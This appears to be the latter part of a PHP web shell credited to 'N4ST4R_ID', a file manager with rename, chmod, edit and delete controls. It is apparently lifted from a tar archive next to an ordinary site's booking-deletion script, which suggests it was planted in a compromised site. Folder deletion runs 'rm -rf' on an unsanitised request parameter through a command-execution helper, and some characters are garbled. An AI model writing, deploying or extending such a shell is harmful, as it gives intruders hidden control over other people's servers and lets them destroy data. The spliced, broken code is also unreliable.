                        <button class="block mt-3 w-full max-w-sm mx-auto text-white bg-indigo-600 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-blue-600 dark:hover:bg-indigo-600 dark:focus:ring-blue-800 cursor-pointer" type="submit" name="renamefolder">
                            Rename Folder
                        </button>
                    </div>
                </form>
                <?php
                if (isset($_POST["renamefolder"])) {
                    $newName = $_POST["new_name"];
                    $newPath = $path . "/" . $newName;

                    if (rename($folderPath, $newPath)) {
                        $_SESSION["success"] = "Folder renamed successfully!";
                        header("Refresh:0; url=?path=" . urlencode($path) . "&folder=" . $newName . "&action=renamefolder");
                        exit;
                    } else {
                        $_SESSION["error"] = "Failed to rename folder!";
                        header("Refresh:0; url=?path=" . urlencode($path));
                        exit;
                    }
                }
            } else {
                ?>
                <div class='mt-4 text-red-600 font-medium'>Folder does not exist or is not writable.</div>
            <?php
            }
        }

        if (isset($_GET["action"]) && $_GET["action"] === "chmodfolder" && isset($_GET["folder"])) {
            $folderPath = $path . "/" . $_GET["folder"];
            if (file_exists($folderPath) && is_dir($folderPath) && is_writable($folderPath)) {
            ?>
                <form method="post" action="">
                    <div class='mt-4'>
                        <h2 class='text-lg font-semibold'>Chmod Folder: <code><?= htmlspecialchars($_GET["folder"]); ?></code></h2>
                        <input type="text" name="new_perms" class="block w-full p-2.5 text-sm text-gray-900 font-medium bg-gray-50 shadow-md rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" value="<?= substr(sprintf('%o', @fileperms($folderPath)), -4); ?>" required>
                        <button class="block mt-3 w-full max-w-sm mx-auto text-white bg-indigo-600 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-blue-600 dark:hover:bg-indigo-600 dark:focus:ring-blue-800 cursor-pointer" type="submit" name="chmodfolder">
                            Change Permission
                        </button>
                    </div>
                </form>
                <?php
                if (isset($_POST["chmodfolder"])) {
                    $newPerms = intval($_POST["new_perms"], 8);

                    if (chmod($folderPath, $newPerms)) {
                        $_SESSION["success"] = "Successfully changed permission!";
                        header("Refresh:0; url=?path=" . urlencode($path) . "&folder=" . $_GET["folder"] . "&action=chmodfolder");
                        exit;
                    } else {
                        $_SESSION["error"] = "Failed to change permission!";
                        header("Refresh:0; url=?path=" . urlencode($path));
                        exit;
                    }
                }
            } else {
                ?>
                <div class='mt-4 text-red-600 font-medium'>Folder does not exist or is not writable.</div>
        <?php
            }
        }

        if (isset($_GET["action"]) && $_GET["action"] === "deletefolder" && isset($_GET["folder"])) {
            $folderPath = $path . "/" . $_GET["folder"];
            if (file_exists($folderPath) && is_dir($folderPath) && is_writable($folderPath)) {
                if (ekse("rm -rf " . $_GET["folder"], $path) !== false) {
                    $_SESSION["success"] = "Folder deleted successfully!";
                    header("Refresh:0; url=?path=" . urlencode($path));
                    exit;
                } else {
                    $_SESSION["error"] = "Failed to delete folder!";
                    header("Refresh:0; url=?path=" . urlencode($path));
                    exit;
                }
            } else {
                echo "<div class='mt-4 text-red-600 font-medium'>Folder does not exist or is not writable.</div>";
            }
        }
        /* END FOLDER ACTIONS */
        ?>

        <div class="flex mt-5">
            <a class="flex gap-x-1 item-center text-gray-700 uppercase bg-gray-50 shadow-md dark:bg-gray-700 dark:text-gray-400 p-3 rounded-tl-lg br-8 hover:scale-110 transition-transform duration-300 ease-in-out" href="?path=<?= $path; ?>&action=newfile">
                <svg class="w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="none" viewBox="0 0 24 24">
                    <path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M5 12h14m-7 7V5" />
                </svg>
                <span>FILE</span>
            </a>
            <a class="flex gap-x-1 item-center text-gray-700 uppercase bg-gray-50 shadow-md dark:bg-gray-700 dark:text-gray-400 p-3 rounded-tr-lg bl-8 hover:scale-110 transition-transform duration-300 ease-in-out" href="?path=<?= $path; ?>&action=newfolder">
                <svg class="w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="none" viewBox="0 0 24 24">
                    <path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M5 12h14m-7 7V5" />
                </svg>
                <span>DIR</span>
            </a>
        </div>

        <!-- TABLE DISPLAY -->
        <div class="relative overflow-x-auto shadow-lg rounded-br-lg rounded-bl-lg rounded-tr-lg">
            <table class="w-full text-sm text-left rtl:text-right text-gray-500 dark:text-gray-400">
                <thead class="text-xs text-gray-700 uppercase bg-gray-50 dark:bg-gray-700 dark:text-gray-400">
                    <tr>
                        <th class="px-6 py-3">Name</th>
                        <th class="px-6 py-3">Size</th>
                        <th class="px-6 py-3">Owner/Group</th>
                        <th class="px-6 py-3">Permission</th>
                        <th class="px-6 py-3">Action</th>
                    </tr>
                </thead>
                <?php if (is_readable($path)): ?>
                    <tbody>
                        <?php
                        $itemsPerPage = 50;
                        $search = isset($_GET['search']) ? strtolower(trim($_GET['search'])) : '';

                        // Get all items
                        $allItems = scandir($path);
                        $allItems = array_diff($allItems, ['.', '..']);

                        // Apply search filter
                        if ($search !== '') {
                            $allItems = array_filter($allItems, function ($item) use ($search) {
                                return strpos(strtolower($item), $search) !== false;
                            });
                        }

                        $allItems = array_values($allItems); // reindex
                        $totalItems = count($allItems);
                        $totalPages = ceil($totalItems / $itemsPerPage);
                        $page = isset($_GET['page']) ? max(1, intval($_GET['page'])) : 1;
                        $offset = ($page - 1) * $itemsPerPage;
                        $pagedItems = array_slice($allItems, $offset, $itemsPerPage);

                        if (empty($pagedItems)) {
                            echo "<tr><td colspan='5' class='px-6 py-4 text-center text-gray-500 dark:text-gray-400'>No matching files or folders found.</td></tr>";
                        }

                        // Folders
                        foreach ($pagedItems as $folder) {
                            if (is_file($path . DIRECTORY_SEPARATOR . $folder)) continue;
                            $folderPath = $path . DIRECTORY_SEPARATOR . $folder;
                            $folderPerms = substr(sprintf('%o', @fileperms($folderPath)), -4);
                        ?>
                            <tr class='bg-white border-b dark:bg-gray-800 dark:border-gray-700 hover:bg-gray-50 shadow-md dark:hover:bg-gray-600'>
                                <td class='px-6 py-4 font-medium text-gray-900 whitespace-nowrap dark:text-white'>
                                    <a class="flex items-center gap-x-1" href="?path=<?= urlencode($path . DIRECTORY_SEPARATOR . $folder); ?>&search=<?= urlencode($search) ?>">
                                        <svg class="w-6 h-6 text-yellow-500 dark:text-yellow-400" xmlns="http://www.w3.org/2000/svg" fill="currentColor" viewBox="0 0 24 24">
                                            <path fill-rule="evenodd" d="M3 6a2 2 0 0 1 2-2h5.532a2 2 0 0 1 1.536.72l1.9 2.28H3V6Zm0 3v10a2 2 0 0 0 2 2h14a2 2 0 0 0 2-2V9H3Z" clip-rule="evenodd" />
                                        </svg>
                                        <span><?= htmlspecialchars($folder); ?></span>
                                    </a>
                                </td>
                                <td class='px-6 py-4 font-medium'>---</td>
                                <td class='px-6 py-4 font-medium'><?= gor($folderPath); ?>/<?= ggr($folderPath); ?></td>
                                <td class='px-6 py-4 font-medium <?= is_writable($folderPath) ? "text-green-500 dark:text-green-400" : "text-red-500 dark:text-red-400"; ?>'><?= $folderPerms; ?></td>
                                <td class='px-6 py-4 flex gap-x-1'>
                                    <!-- Folder actions (same as before) -->
                                    <a href="?path=<?= urlencode($path) ?>&folder=<?= urlencode($folder) ?>&action=renamefolder&search=<?= urlencode($search) ?>">
                                        <svg class="w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="none" viewBox="0 0 24 24">
                                            <path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10.779 17.779 4.36 19.918 6.5 13.5m4.279 4.279 8.364-8.643a3.027 3.027 0 0 0-2.14-5.165 3.03 3.03 0 0 0-2.14.886L6.5 13.5m4.279 4.279L6.499 13.5m2.14 2.14 6.213-6.504M12.75 7.04 17 11.28" />
                                        </svg>
                                    </a>
                                    <a href="?path=<?= urlencode($path) ?>&folder=<?= urlencode($folder) ?>&action=chmodfolder&search=<?= urlencode($search) ?>">
                                        <svg class="w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="none" viewBox="0 0 24 24">
                                            <path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M8 8v8m0-8h8M8 8H6a2 2 0 1 1 2-2v2Zm0 8h8m-8 0H6a2 2 0 1 0 2 2v-2Zm8 0V8m0 8h2a2 2 0 1 1-2 2v-2Zm0-8h2a2 2 0 1 0-2-2v2Z" />
                                        </svg>
                                    </a>
                                    <a href="?path=<?= urlencode($path) ?>&folder=<?= urlencode($folder) ?>&action=deletefolder&search=<?= urlencode($search) ?>">
                                        <svg class="w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="currentColor" viewBox="0 0 24 24">
                                            <path fill-rule="evenodd" d="M8.586 2.586A2 2 0 0 1 10 2h4a2 2 0 0 1 2 2v2h3a1 1 0 1 1 0 2v12a2 2 0 0 1-2 2H7a2 2 0 0 1-2-2V8a1 1 0 0 1 0-2h3V4a2 2 0 0 1 .586-1.414ZM10 6h4V4h-4v2Zm1 4a1 1 0 1 0-2 0v8a1 1 0 1 0 2 0v-8Zm4 0a1 1 0 1 0-2 0v8a1 1 0 1 0 2 0v-8Z" clip-rule="evenodd" />
                                        </svg>
                                    </a>
                                </td>
                            </tr>
                        <?php
                        }

                        // Files
                        foreach ($pagedItems as $file) {
                            if (is_dir($path . DIRECTORY_SEPARATOR . $file)) continue;
                            $filePath = $path . DIRECTORY_SEPARATOR . $file;
                            $fileSize = @filesize($filePath);
                            $filePerms = substr(sprintf('%o', @fileperms($filePath)), -4);
                        ?>
                            <tr class='bg-white border-b dark:bg-gray-800 dark:border-gray-700 hover:bg-gray-50 shadow-md dark:hover:bg-gray-600'>
                                <td class='px-6 py-4 font-medium text-gray-900 whitespace-nowrap dark:text-white'>
                                    <a class="flex items-center gap-x-1" href="?path=<?= urlencode($path) ?>&file=<?= urlencode($file) ?>&action=view&search=<?= urlencode($search) ?>">
                                        <svg class="w-6 h-6 text-blue-400 dark:text-blue-300" xmlns="http://www.w3.org/2000/svg" fill="currentColor" viewBox="0 0 24 24">
                                            <path fill-rule="evenodd" d="M9 2.221V7H4.221a2 2 0 0 1 .365-.5L8.5 2.586A2 2 0 0 1 9 2.22ZM11 2v5a2 2 0 0 1-2 2H4v11a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V4a2 2 0 0 0-2-2h-7Z" clip-rule="evenodd" />
                                        </svg>
                                        <span><?= htmlspecialchars($file); ?></span>
                                    </a>
                                </td>
                                <td class='px-6 py-4 font-medium'><?= $fileSize ?> bytes</td>
                                <td class='px-6 py-4 font-medium'><?= gor($filePath); ?>/<?= ggr($filePath); ?></td>
                                <td class='px-6 py-4 font-medium <?= is_writable($filePath) ? "text-green-500 dark:text-green-400" : "text-red-500 dark:text-red-400"; ?>'><?= $filePerms; ?></td>
                                <td class='px-6 py-4 flex gap-x-1'>
                                    <!-- File actions (add search param to preserve search result) -->
                                    <a href="?path=<?= urlencode($path) ?>&file=<?= urlencode($file) ?>&action=edit&search=<?= urlencode($search) ?>">
                                        <svg class="w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="currentColor" viewBox="0 0 24 24">
                                            <path fill-rule="evenodd" d="M11.32 6.176H5c-1.105 0-2 .949-2 2.118v10.588C3 20.052 3.895 21 5 21h11c1.105 0 2-.948 2-2.118v-7.75l-3.914 4.144A2.46 2.46 0 0 1 12.81 16l-2.681.568c-1.75.37-3.292-1.263-2.942-3.115l.536-2.839c.097-.512.335-.983.684-1.352l2.914-3.086Z" clip-rule="evenodd" />
                                            <path fill-rule="evenodd" d="M19.846 4.318a2.148 2.148 0 0 0-.437-.692 2.014 2.014 0 0 0-.654-.463 1.92 1.92 0 0 0-1.544 0 2.014 2.014 0 0 0-.654.463l-.546.578 2.852 3.02.546-.579a2.14 2.14 0 0 0 .437-.692 2.244 2.244 0 0 0 0-1.635ZM17.45 8.721 14.597 5.7 9.82 10.76a.54.54 0 0 0-.137.27l-.536 2.84c-.07.37.239.696.588.622l2.682-.567a.492.492 0 0 0 .255-.145l4.778-5.06Z" clip-rule="evenodd" />
                                        </svg>
                                    </a>
                                    <a href="?path=<?= urlencode($path) ?>&file=<?= urlencode($file) ?>&action=renamefile&search=<?= urlencode($search) ?>">
                                        <svg class="w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="none" viewBox="0 0 24 24">
                                            <path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10.779 17.779 4.36 19.918 6.5 13.5m4.279 4.279 8.364-8.643a3.027 3.027 0 0 0-2.14-5.165 3.03 3.03 0 0 0-2.14.886L6.5 13.5m4.279 4.279L6.499 13.5m2.14 2.14 6.213-6.504M12.75 7.04 17 11.28" />
                                        </svg>
                                    </a>
                                    <a href="?path=<?= urlencode($path) ?>&file=<?= urlencode($file) ?>&action=chmodfile&search=<?= urlencode($search) ?>">
                                        <svg class="w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="none" viewBox="0 0 24 24">
                                            <path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M8 8v8m0-8h8M8 8H6a2 2 0 1 1 2-2v2Zm0 8h8m-8 0H6a2 2 0 1 0 2 2v-2Zm8 0V8m0 8h2a2 2 0 1 1-2 2v-2Zm0-8h2a2 2 0 1 0-2-2v2Z" />
                                        </svg>
                                    </a>
                                    <a href="?path=<?= urlencode($path) ?>&file=<?= urlencode($file) ?>&action=deletefile&search=<?= urlencode($search) ?>">
                                        <svg class="w-6 h-6 text-gray-800 dark:text-white" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="currentColor" viewBox="0 0 24 24">
                                            <path fill-rule="evenodd" d="M8.586 2.586A2 2 0 0 1 10 2h4a2 2 0 0 1 2 2v2h3a1 1 0 1 1 0 2v12a2 2 0 0 1-2 2H7a2 2 0 0 1-2-2V8a1 1 0 0 1 0-2h3V4a2 2 0 0 1 .586-1.414ZM10 6h4V4h-4v2Zm1 4a1 1 0 1 0-2 0v8a1 1 0 1 0 2 0v-8Zm4 0a1 1 0 1 0-2 0v8a1 1 0 1 0 2 0v-8Z" clip-rule="evenodd" />
                                        </svg>
                                    </a>
                                </td>
                            </tr>
                        <?php
                        }
                        ?>
                    </tbody>
                <?php else: ?>
                    <span class="text-center text-xs text-gray-700 uppercase bg-gray-50 shadow-md dark:bg-gray-700 dark:text-gray-400">Directory Is NOT Readable</span>
                <?php endif; ?>
            </table>
        </div>
        <!-- END TABLE DISPLAY -->

        <!-- PAGINATION -->
        <?php if (is_writable($path)): ?>
            <div class="flex justify-center mt-4">
                <?php if ($totalPages > 1): ?>
                    <?php
                    // Preserve search query if exists
                    $searchParam = $search !== '' ? '&search=' . urlencode($search) : '';
                    ?>
                    <nav aria-label="Page navigation">
                        <ul class="inline-flex space-x-1 text-sm">

                            <!-- Previous Button -->
                            <li>
                                <?php if ($page > 1): ?>
                                    <a href="?path=<?= urlencode($path) . $searchParam ?>&page=<?= $page - 1 ?>"
                                        class="flex items-center justify-center w-8 h-8 text-gray-500 bg-white border border-gray-300 rounded-lg 
                               hover:bg-gray-100 hover:text-gray-700 
                               dark:bg-gray-800 dark:border-gray-700 dark:text-gray-400 dark:hover:bg-gray-700 dark:hover:text-white">
                                        鈥�
                                    </a>
                                <?php else: ?>
                                    <span class="flex items-center justify-center w-8 h-8 text-gray-400 bg-gray-200 border border-gray-300 rounded-lg 
                                 dark:bg-gray-700 dark:border-gray-700 dark:text-gray-500">
                                        鈥�
                                    </span>
                                <?php endif; ?>
                            </li>

                            <!-- Page Numbers (3 buttons with ellipsis if needed) -->
                            <?php
                            $range = 1; // show current page 卤1
                            $ellipsisShownLeft = false;
                            $ellipsisShownRight = false;

                            for ($i = 1; $i <= $totalPages; $i++) {
                                if ($i == 1 || $i == $totalPages || ($i >= $page - $range && $i <= $page + $range)) {
                                    if ($i == $page) {
                                        // Active page
                                        echo '<li>
                            <span class="flex items-center justify-center w-8 h-8 text-blue-600 border border-gray-300 bg-blue-50 
                                         dark:border-gray-700 dark:bg-gray-700 dark:text-white">' . $i . '</span>
                        </li>';
                                    } else {
                                        echo '<li>
                            <a href="?path=' . urlencode($path) . $searchParam . '&page=' . $i . '" 
                               class="flex items-center justify-center w-8 h-8 text-gray-500 bg-white border border-gray-300 rounded-lg 
                                      hover:bg-gray-100 hover:text-gray-700 
                                      dark:bg-gray-800 dark:border-gray-700 dark:text-gray-400 dark:hover:bg-gray-700 dark:hover:text-white">' . $i . '</a>
                        </li>';
                                    }
                                } else {
                                    if ($i < $page - $range && !$ellipsisShownLeft) {
                                        echo '<li><span class="flex items-center justify-center w-8 h-8">...</span></li>';
                                        $ellipsisShownLeft = true;
                                    }
                                    if ($i > $page + $range && !$ellipsisShownRight) {
                                        echo '<li><span class="flex items-center justify-center w-8 h-8">...</span></li>';
                                        $ellipsisShownRight = true;
                                    }
                                }
                            }
                            ?>

                            <!-- Next Button -->
                            <li>
                                <?php if ($page < $totalPages): ?>
                                    <a href="?path=<?= urlencode($path) . $searchParam ?>&page=<?= $page + 1 ?>"
                                        class="flex items-center justify-center w-8 h-8 text-gray-500 bg-white border border-gray-300 rounded-lg 
                               hover:bg-gray-100 hover:text-gray-700 
                               dark:bg-gray-800 dark:border-gray-700 dark:text-gray-400 dark:hover:bg-gray-700 dark:hover:text-white">
                                        鈥�
                                    </a>
                                <?php else: ?>
                                    <span class="flex items-center justify-center w-8 h-8 text-gray-400 bg-gray-200 border border-gray-300 rounded-lg 
                                 dark:bg-gray-700 dark:border-gray-700 dark:text-gray-500">
                                        鈥�
                                    </span>
                                <?php endif; ?>
                            </li>

                        </ul>
                    </nav>
                <?php endif; ?>
            </div>
        <?php endif; ?>
        <!-- END PAGINATION -->


        <footer>
            <div class="mt-6 text-center text-gray-500 text-sm mb-2">
                <p>Created by <span class="text-blue-600">N4ST4R_ID | Naxtarrr</span></p>
        </footer>
    </div>

    <script>
        const themeToggleDarkIcon = document.getElementById('theme-toggle-dark-icon');
        const themeToggleLightIcon = document.getElementById('theme-toggle-light-icon');
        const lightText = document.querySelector('#light-text');
        const darkText = document.querySelector('#dark-text');
        const themeToggleBtn = document.getElementById('theme-toggle');

        // Initial state
        if (
            localStorage.getItem('color-theme') === 'dark' ||
            (!('color-theme' in localStorage) && window.matchMedia('(prefers-color-scheme: dark)').matches)
        ) {
            document.documentElement.classList.add('dark');
            themeToggleLightIcon.classList.remove('hidden'); // show sun
            themeToggleDarkIcon.classList.add('hidden'); // hide moon
            lightText.classList.remove('hidden');
            darkText.classList.add('hidden');
        } else {
            document.documentElement.classList.remove('dark');
            themeToggleDarkIcon.classList.remove('hidden'); // show moon
            themeToggleLightIcon.classList.add('hidden'); // hide sun
            lightText.classList.add('hidden');
            darkText.classList.remove('hidden');
        }

        // Toggle handler
        themeToggleBtn.addEventListener('click', function() {
            if (document.documentElement.classList.contains('dark')) {
                // Switch to light
                document.documentElement.classList.remove('dark');
                localStorage.setItem('color-theme', 'light');

                themeToggleDarkIcon.classList.remove('hidden');
                themeToggleLightIcon.classList.add('hidden');

                lightText.classList.add('hidden');
                darkText.classList.remove('hidden');
            } else {
                // Switch to dark
                document.documentElement.classList.add('dark');
                localStorage.setItem('color-theme', 'dark');

                themeToggleLightIcon.classList.remove('hidden');
                themeToggleDarkIcon.classList.add('hidden');

                lightText.classList.remove('hidden');
                darkText.classList.add('hidden');
            }
        });


        const closeToast = document.querySelector('[data-dismiss-target="#toast-default"]');
        if (closeToast) {
            closeToast.addEventListener('click', () => {
                const toast = document.getElementById('toast-default');
                if (toast) {
                    toast.classList.add('hidden');
                    <?php
                    if (isset($_SESSION["error"])) {
                        unset($_SESSION["error"]);
                    } elseif (isset($_SESSION["success"])) {
                        unset($_SESSION["success"]);
                    }
                    ?>
                }
            });
        }
    </script>
    <script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/flowbite.min.js"></script>
</body>

</html>

<?php
ob_end_flush();
?>ajax/booking.php000064400000000611151213033150007620 0ustar00<?php

include_once(dirname(__FILE__) . '/../../../class/include.php');
include_once(dirname(__FILE__) . '/../../auth.php');

if ($_POST['option'] == 'delete') {

    $BOOKING = new Booking($_POST['id']);
  
    $result = $BOOKING->delete();

    if ($result) {
        $data = array("status" => TRUE);
        header('Content-type: application/json');
        echo json_encode($data);
    }
}